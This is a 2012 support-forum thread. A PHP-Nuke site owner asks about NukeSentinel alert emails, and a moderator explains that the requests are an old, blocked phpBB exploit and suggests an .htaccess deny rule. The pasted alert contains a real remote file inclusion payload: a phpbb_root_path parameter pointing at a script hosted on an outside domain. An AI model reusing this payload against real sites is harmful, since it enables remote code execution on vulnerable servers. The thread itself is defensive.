PHP Web Host - Quality Web Hosting For All PHP Applications $35/month $250/year (Unlimited) - $25/month - 200,000 impressions - Your Ad Could be Here - Click For Details
  Login or Register
 • Home • Downloads • Your Account • Forums • 

View next topic
View previous topic


Google
 
Web RavenPHPScripts (This Site)
Post new topic   Reply to topic
Author Message
daverupe
New Member
New Member


Joined: Dec 30, 2005
Posts: 24

PostPosted: Mon Jan 16, 2012 8:13 am Reply with quote Back to top

I'm not sure what is going on. I have a site that has been up for several months with no issues. Suddenly, This past weekend, I began receiving several emails from NukeSentinel. The blocked IP Addresses are different. When I go into NukeSentineland look for the blocked IP's I don't see them there.

Here is a sample of the emails I'm getting from NukeSentinel (I've xxx out my ip address)
Code:
Subject: Blocked abuse from 91.121.170.124

Created By: NukeSentinel(tm) 2.6.03
Date & Time: 2012-01-15 22:46:30 EST GMT -0500 Blocked IP: 91.121.170.124 User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
Referer: none
User Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6 HTTP Host: xxx.xxx.xxx.xxx:xxxx Script Name: /modules/Forums/admin/admin_groups.php
Query String: phpbb_root_path=http://www.news.sakhtemani.net/images/daster.jpg??
Get String: phpbb_root_path=http://www.news.sakhtemani.net/images/daster.jpg??
Post String: Not Available
Forwarded For: none
Client IP: none
Remote Address: 91.121.170.124
Remote Port: 36955
Request Method: GET


Can anyone tell me what is going on and give a recommendation on how to stop it, or at least BLOCK these IP Addresses.?
View user's profile Send private message
Susann
Moderator


Joined: Dec 19, 2004
Posts: 3143
Location: Germany:Moderator German NukeSentinel Support

PostPosted: Mon Jan 16, 2012 11:06 am Reply with quote Back to top

You can always change the settings in the Abuse blocker for example ban but no emails.Check your settings in this block. However, this is an old phpBB exploit and you are well protected with NukeSentinel. You can ignore this because it doesn´t work and they will stop it sometime and try other sites.
If you like to ban for a limited time this IP with cidr via .htaccess
deny 91.121.0.0/16
View user's profile Send private message Visit poster's website
daverupe
New Member
New Member


Joined: Dec 30, 2005
Posts: 24

PostPosted: Mon Jan 16, 2012 11:37 am Reply with quote Back to top

Thank you for the explanation! I was getting worried.
View user's profile Send private message
Display posts from previous:       
Post new topic   Reply to topic

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
Forums ©
 

All logos and trademarks in this site are property of their respective owner.
The comments are property of their posters, all the rest © 2002-2011 by Raven

You can syndicate our news using the file xml

CSE HTML Validator Helped Clean up This Page! [Valid RSS] valid RSS 2.0 Valid robots.txt Stop Spam Harvesters, Join Project Honey Pot

Website engines core code is © copyright by PHP-Nuke but has been heavily patched and modified by myself and others.
PHP-Nuke is a free software released under the GNU/GPL.


:: fisubice phpbb2 style by Daz :: PHP-Nuke theme by www.nukemods.com ::
:: fisubice Theme Modified by the RavenNuke™ Team ::

:: W3C CSS Compliance Validation :: W3C HTML 4.01 Transitional Compliance Validation ::

zerosum